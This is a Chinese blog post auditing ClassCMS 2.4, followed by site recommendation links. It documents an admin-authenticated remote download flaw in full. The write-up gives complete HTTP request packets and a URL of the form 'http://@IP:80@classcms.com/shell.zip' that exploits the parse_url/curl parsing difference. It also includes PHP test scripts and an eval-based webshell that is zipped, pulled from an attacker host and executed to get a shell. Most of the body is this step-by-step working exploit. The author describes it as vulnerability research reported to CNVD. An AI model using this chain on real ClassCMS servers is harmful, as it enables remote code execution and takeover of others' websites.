ClassCMS2.4代码审计

最新推荐文章于 2024-04-05 18:33:33 发布
最新推荐文章于 2024-04-05 18:33:33 发布
阅读量2k 收藏 1
点赞数
分类专栏: 代码审计 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45794666/article/details/122675276
版权

ClassCMS2.4代码审计

前言

首发于先知社区:ClassCMS2.4代码审计

此次漏洞分析皆在本地测试,且漏洞已经提交至cnvd平台

漏洞url

需要后台管理员权限

http:///ClassCMS/admin666?do=shop:downloadClass&ajax=1

漏洞点

在后台的 管理->应用管理->应用下载处存在任意远程文件下载

image-20211216154721267

image-20211216154736162

先放掉第一个请求包

POST /admin666?do=shop:index&ajax=1&action=fileurl&from=install HTTP/1.1
Host: classcms
Content-Length: 43
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://classcms
Referer: http://classcms/admin666?do=shop:index&bread=%E8%87%AA%E5%AE%9A%E4%B9%89%E8%A1%A8%E5%8D%95&action=detail&classhash=diyform
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: token_2ab421=9632c6413dde844887912fd77a75a07f; csrf_2ab421=1547308b
Connection: close

classhash=diyform&version=1.1&csrf=1547308b

然后修改第二个请求包

POST /admin666?do=shop:downloadClass&ajax=1 HTTP/1.1
Host: classcms
Content-Length: 85
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.159.1
Referer: http://192.168.159.1/ClassCMS/admin666?do=shop:index&bread=%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91&action=detail&classhash=classcreate
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: token_2ab421=5d012ca838cc5f0aff02c44c8e2c91e7; csrf_2ab421=338ceb00
Connection: close

classhash={dir}&url=http://@{ip}:{port}@classcms.com/{shell.zip}&csrf=338ceb00

参数解析

  • classhash为解压出来的最后文件名

  • url为了绕过过滤设成如下形式

    http://@192.168.159.1:80@classcms.com/shell.zip
远程ip端口(默认80也需要加上),一个包含木马文件(shell.php)的zip压缩包

  • csrf参数不动即可

发送之后返回:安装包格式错误,请重试

就说明已经成功被下载到目标服务器上并解压

最后访问url即可执行上传上的木马getshell

http://192.168.159.1/ClassCMS/class/{classhash的值}/{上传压缩包中的木马文件}

漏洞测试

首先黑盒测试

在下载的第二个请求包中发现url参数解码为classcms官网的应用压缩包地址

POST /admin666?do=shop:downloadClass&ajax=1 HTTP/1.1
Host: classcms
Content-Length: 140
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://classcms
Referer: http://classcms/admin666?do=shop:index&bread=%E8%87%AA%E5%AE%9A%E4%B9%89%E8%A1%A8%E5%8D%95&action=detail&classhash=diyform
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: token_2ab421=9632c6413dde844887912fd77a75a07f; csrf_2ab421=1547308b
Connection: close

classhash=diyform&url=http%3A%2F%2Fclasscms.com%2Fshop%2F%3Faction%3Ddownload%26version%3D1.1%26classhash%3Ddiyform%26token%3D&csrf=1547308b

可能存在远程下载

http://classcms.com/shop/?action=download&version=1.1&classhash=diyform&token=

尝试修改url,得到报错回显

image-20211216160945402

Unicode解码得到 :下载失败

进行白盒测试

回到源码来,通过全局搜索报错提示(下载失败)定位到源码在/class/shop/shop.php中

image-20211216161043875

一处为在downloadClass函数中一处在upgradeClass函数中,观察功能显然是在downloadClass中

 function downloadClass() {
    	。。。。。。
        if(!C('this:download',$url,$classfile)) {
            Return C('cms:common:echoJson',array('msg'=>"下载失败",'error'=>1));
        }
        。。。。。。
    }

在this(当前文件shop.php)->download函数下,定位到关键函数

function download($url,$filepath) {
        $hosts=array_merge(explode(';',C('this:defaultHost')),array(config('host')));
        if($defaulthost=config('defaulthost')) {
            $hosts=array_merge($hosts,explode(';',$defaulthosts));
        }
        $checkurl=parse_url($url);
        if(!isset($checkurl['host']) || !in_array($checkurl['host'],$hosts)) {
            Return false;
        }
        $curl=curl_init();
        curl_setopt($curl,CURLOPT_URL,$url);
        if(!$fp = @fopen ($filepath,'w+')) {
            Return false;
        }
        curl_setopt($curl,CURLOPT_FILE, $fp);
        curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
        curl_setopt($curl,CURLOPT_TIMEOUT,300);
        curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,FALSE);
        curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,FALSE);
        curl_setopt($curl,CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
        curl_setopt($curl,CURLOPT_POST,1);
        curl_setopt($curl,CURLOPT_POSTFIELDS,C('this:shopInfo'));
        $info=curl_exec($curl);
        $httpinfo=curl_getinfo($curl);
        curl_close($curl);
        fclose($fp);
        if($httpinfo['http_code']>=300) {@unlink($filepath);Return false;}
        Return $info;
    }

函数首先获取了默认允许的host,在this(前文件下)->defaultHost函数中

image-20211216155027088

只允许 classcms.com;classcms.uuu.la

这里可以抓包调试一下,可以看到确实是获取了这两个根域(虽然数组是三个)

image-20211216163555764

然后将我们传入的url (这里是http://192.168.159.1/1.txt) 通过parse_url函数解析后在判断是否是在数组中

我们的攻击url也就是down在了这里,那么目标就是绕过这个判断然后执行接下来的curl命令

if(!isset($checkurl['host']) || !in_array($checkurl['host'],$hosts)) {
    Return false;        
}

前一个条件存在是肯定满足的,那么只需要让经过parse_url解析过的host键值和数组相等即可

这里利用php中的parse_url函数和lib_curl对url的解析差异,导致了对host的过滤失效来进行绕过

  • php-curl拓展解析的url host在第首个@之后
  • 而parse_url则是最后一个@之后

所以构造处payload

http://@192.168.159.1:80@classcms.com/1.zip

本地尝试绕过

<?php
    $hosts = ["classcms.com","classcms.uuu.la","classcms.com"];
	$url = "http://@192.168.159.1:80@classcms.com/1.zip";
	$checkurl = parse_url($url);
	var_dump($checkurl);
	if(!isset($checkurl['host']) || !in_array($checkurl['host'],$hosts)) {
        echo "nono!";
    }else{
        echo "success!";
    }
?>

成功绕过

image-20211216164910824

绕过之后尝试执行curl

<?php
    $hosts = ["classcms.com","classcms.uuu.la","classcms.com"];
	$url = "http://@192.168.159.1:80@classcms.com/1.zip";
	$checkurl = parse_url($url);
	//var_dump($checkurl);
	if(!isset($checkurl['host']) || !in_array($checkurl['host'],$hosts)) {
        echo "nono!";
    }else{
        echo "success!";
        $curl=curl_init();
        curl_setopt($curl,CURLOPT_URL,$url);
        curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
        curl_setopt($curl,CURLOPT_TIMEOUT,300);
        curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,FALSE);
        curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,FALSE);
        curl_setopt($curl,CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
        curl_setopt($curl,CURLOPT_POST,1);
        $info=curl_exec($curl);
        $httpinfo=curl_getinfo($curl);
        var_dump($info,$httpinfo);
        curl_close($curl);}
?>

成功执行curl完成远程下载

image-20211216181447914

那么构造一个木马文件 lyy.php

<?php phpinfo();@eval($_POST['lyy']);?>

压缩成zip文件 lyy.zip 然后构造请求包

POST /admin666?do=shop:downloadClass&ajax=1 HTTP/1.1
Host: classcms
Content-Length: 66
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://classcms
Referer: http://classcms/admin666?do=shop:index&bread=%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91&action=detail&classhash=classcreate
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: token_2ab421=9632c6413dde844887912fd77a75a07f; csrf_2ab421=1547308b;
Connection: close

classhash=test&url=http://@192.168.159.1:80@classcms.com/lyy.zip&csrf=1547308b

可以看到已经成功绕过那个if条件,并且执行curl下载成功(返回true)

image-20211216182107628

虽然最后还是报错安装包格式错误,请重试

但是可以看到他在unzip方法处理后的if中而不是else中,说明已经成功下载并解压

image-20211216183159966

而cms目录下的class.php中的unzip也很简单

function unzip($src_file, $dest_dir=false, $create_zip_name_dir=true, $overwrite=true)     {
    if(class_exists('ZipArchive')) {
        $zip = new ZipArchive;
        if ($zip->open($src_file) === TRUE)            {
            if(@$zip->extractTo($dest_dir)) {
                $zip->close();
                Return true;                
            }
            $zip->close();
        }       
        。。。    
    }

  • $src_file就是D:\phpStudy\PHPTutorial\WWW\ClassCMS\cache\shop\89a5f4d7d35347db4dd558079c11a612.class

    • 是curl之后产生的一个临时文件

  • $dest_dir就是D:\phpStudy\PHPTutorial\WWW\ClassCMS\class\test\

    • /class/{classhash参数值}的目录

所以函数的作用就是存在ZipArchive类(php_zip拓展,默认开启)时,解压临时文件内容到/class/{classhash参数值}的目录

所以最后木马文件的访问执行payload为

http://ClassCMS/class/{classhash的值}/{上传压缩包中的木马文件}这里为http://ClassCMS/class/test/lyy.php

成功执行代码并getshell

image-20211216183731640

image-20211216184320671

后记

这个漏洞是php curl 和 parse_url的解析差异导致的,是2017年blackhat上orange师傅的: A New Era of SSRF 中提到的

在较新版本的curl(curl>=7.54.0)中已经修复了多个@的解析问题,使用多个@会报错

由于没有找到php和curl对应版本资料(哪位大师傅知道可以告诉我),这里我测试了phpstudy上的所有php版本,下面两个已经修复

image-20211220154718767

6ri9ht
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ClassCMS 2.4代码审计1
08-03
ClassCMS 2.4 代码审计 - 先知社区此次漏洞分析皆在本地测试,且漏洞已经提交 cnvd 平台需要后台管理员权限在后台的 管理 -> 应管理 -> 应
ClassCMS1.3自解压任意文件上传漏洞分析
weixin_42508548的博客
11-24 2519
0x01 前言 之前在某CMS也接触过自解压导致任意文件上传的漏洞,只要对请求URL过滤不严谨,以及逻辑处理存在缺陷便可导致上传可控,直接一步获取服务器权限。本次通过分析ClassCMS源码,从原理上理解此类漏洞。代审小白,分析不到位请大佬们多多体谅。 0x02 环境搭建 1、首先准备phpstudy,这里使用的是2016版本的,php版本为5.6.27 2、部署cms源码 3、访问http://192.168.150.9/index.php进行安装 4、输入相应配置信息,安装
ClassCMS内容管理系统-PHP
06-20
ClassCMS是一款简单、灵活、安全、易于拓展的内容管理系统。 特点: 安全稳定,代码精简,安装包不到1M,没有多余的功能。 兼容PHP5.2--PHP8.0。 在APACHE、NGINX、IIS上都能使用。 支持MySQL、SQLite数据库。 拥有几十种输入框,可以快速搭建各种类型的网站。 可自定义栏目变量、文章字段、用户属性。 搭配模型页面,可以自由建立栏目页面。 拥有完善的应用插件机制,一切皆为应用。 免费使用,无需授权。 ClassCMS 更新日志: v1.9 更新说明 bug修复 v1.8 更新说明 bug修复 v1.7 更新说明 bug修复,支持utf8mb4字符集,支持存储Emoji表情 v1.6 更新说明 bug修复 v1.5 更新说明 bug修复 v1.4 更新说明 bug修复 新增数据树形列表框 v1.3 更新说明 bug修复 兼容ipv6网址 v1.2 更新说明 bug修复 v1.1 更新说明 兼容PHP8 细节优化 bug修复
Class CMS 内容管理系统 v1.0
11-24
为您提供Class CMS 内容管理系统下载,ClassCMS是一款简单、灵活、安全、易于拓展的内容管理系统。特点:安全稳定,代码精简,安装包不到1M,没有多余的功能。兼容PHP5.2--PHP8.0。在APACHE、NGINX、IIS上都能使用。支持MySQL、SQLite数据库。拥有几十种输入框,可以快速搭建各种类型的网站。可自定义栏目变量、文章字段、用户属性。搭配模型页面,可以自由建立栏目页面。拥有完善的应用插件机制,一切皆为应用。
ClassCMS内容管理系统 1.5
04-30
ClassCMS是一款简洁灵活的开源内容管理系统,能非常方便的通过它快速开发各种网站应用,兼容PHP5.2-PHP8.0,在APACHE、NGINX、IIS上都能使用,默认支持MySQL SQLite两种数据库,支持上百万数据量,系统没多余的功能,整体安装包不到1M,拥有完善与灵活的应用插件机制,常用功能均可制作成应用插件,系统模板语言简单,只需要懂HTML+CSS即可制作简单的网站模板。ClassCMS 1.3 更新日志:2021-03-22bug修复。
ClassCMS内容管理系统 v2.4
02-03
安全稳定,代码精简,安装包不到1M,没有多余的功能。 兼容PHP5.2–PHP8.1。 在APACHE、NGINX、IIS上都能使用。 支持MySQL、SQLite数据库。 拥有几十种输入框,可以快速搭建各种类型的网站。 可自定义栏目变量、文章...
ClassCMS v1.2
01-12
为您提供ClassCMS下载,ClassCMS是一款简单、灵活、安全、易于拓展的内容管理系统。特点:安全稳定,代码精简,安装包不到1M,没有多余的功能。兼容PHP5.2--PHP8.0。在APACHE、NGINX、IIS上都能使用。支持MySQL、...
ClassCMS2.4漏洞复现
zkaqlaoniao的博客
12-01 416
使用phpstudy2016搭建web环境,php版本为5.5安装CMS这里选择Mysql数据库进行安装用户名和密码都写默认的admin方便记忆输入完成后点击安装点击安装CMS的安装过程中有个报错忽略就好,登录不进后台的话刷新一下页面进入了ClassCMS的后台。
CMS文章采集接口:优化经验分享,内容介绍全解析
wanghui19880909的博客
11-01 620
本文由一位经验丰富的校长以自己的角度分享了CMS文章采集接口的使用心得和经验,内容分为七个方面进行介绍。1.了解CMS文章采集接口的作用作为一位校长,我深知校园内各类信息的重要性。CMS文章采集接口可以帮助我们快速、高效地采集各类文章信息,包括校园新闻、通知公告等。通过了解接口的作用
ThinkPHP审计(1) 不安全的SQL注入&PHP反序列化链子phar利用&简单的CMS审计实例
最新发布
qq_39947980的博客
04-05 1049
结合经典的CMS 代码审计安全的SQL注入&PHP反序列化链子phar利用&简单的CMS审计实战
国内免费(开源)CMS系统大全
爱码农爱生活
01-11 3678
最近在网上搜集了一下国内的CMS程序,包括了类型,脚本,及其特点和评价,希望能对大家有所帮助,由于搜集于网络难免有不足和纰漏之处,还请大家能多多指正!首先还是介绍一下什么是CMSCMS(Content Management System),中文叫作整站系统、文章系统,大概2004以前,如果想进行网站内容管理,基本上都是靠手工维护,但千变万化的信息流,但没有好的程序支持,还继续靠手工完成是不可能的...
class uesrfun.php,帝国cms教程:在列表页面批量添加Tags的方法
weixin_33277215的博客
03-20 209
本文介绍通过修改程序源码实现在管理资讯时批量添加Tags,效果如下图:修改步骤:1、以下代码加入到admin/ecmsinfo.php,在任意2个elseif中间插入就行elseif($enews=="AddTags_all")//列表批量添加Tags{$classid=$_POST['classid'];$id=$_POST['id'];$tags=$_POST['add_listtags'];...
JAVA代码审计-cms综合篇
shelter1234567的博客
11-02 473
本次用一个cms的源码,来综合深入学习java代码审计...
梦想cms1.4代码审计
m0_60716947的博客
01-07 1885
php代码审计,梦想cms
wuzhicms代码审计
hackzkaq的博客
07-04 581
环境搭建 源码下载官网:https://www.wuzhicms.com/放到本地phpstudy根目录下,访问install路径进行安装。访问后台:访问前台:直接后台挂个链接:漏洞分析 搜索select的时候 发现在mysql.class文件下有一个函数里面有select 并且后面的拼接也没有任何的过滤搜索哪里调用了这个函数,先是在api目录下的sms_check文件中发现调用了get_one函数 并且参数是通过前面的$code拼接。我们可以看到code 先是通过$GLOBALS来获取参数param的值
百家CMS v4.1.4代码审计
D.MIND 的博客
08-19 942
中午在先知上看到篇百家cms代码审计,不是很难,适合我这种菜???? 参考:https://xz.aliyun.com/t/9955#toc-0 源码下载:https://gitee.com/openbaijia/baijiacms.git 文章目录任意目录删除利用远程文件上传利用命令执行利用总结 任意目录删除 漏洞点位于:includes/baijiacms/common.inc.php 首先关注的是unlink函数,他会删除文件,只要$path不是目录就会进入改分支。 但如果你是目录呢,会对目录中非.
极致CMS 漏洞简单分析
ximo的博客
05-02 5024
环境搭建 极致CMS1.6.7 下载地址:https://www.jizhicms.cn/thread-95-1-1.html 目录框架 404.html A 后台控制文件 Conf 公共函数 FrPHP框架 Home 前台控制文件 Public 公共静态文件 README.md admin.php 后台入口 backup 备份 cache 缓存 favicon.ico index.php 前台入口 install readme.txt static 静态文件 web.co
CMS漏洞复现
qq_44832048的博客
07-19 9790
dedeCMS (CNVD-2018-01221) 类型: php类cms系统:dedecms、帝国cms、php168、phpcmscmstop、discuz、phpwind等asp类cms系统:zblog、KingCMS等国外的著名cms系统:joomla、WordPress 、magento、drupal 、mambo。 dedeCMS (CNVD-2018-01221) 漏洞简介...
"ClassCMS 2.4代码审计:先知社区漏洞分析与提交漏洞CNVD平台
本次代码审计针对的是ClassCMS 2.4版本的系统。先知社区对该系统进行了漏洞分析,所有的漏洞测试都是在本地进行的,并且已经将漏洞提交给cnvd平台。而要在后台进行管理的话,需要后台管理员权限来进行操作。具体的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值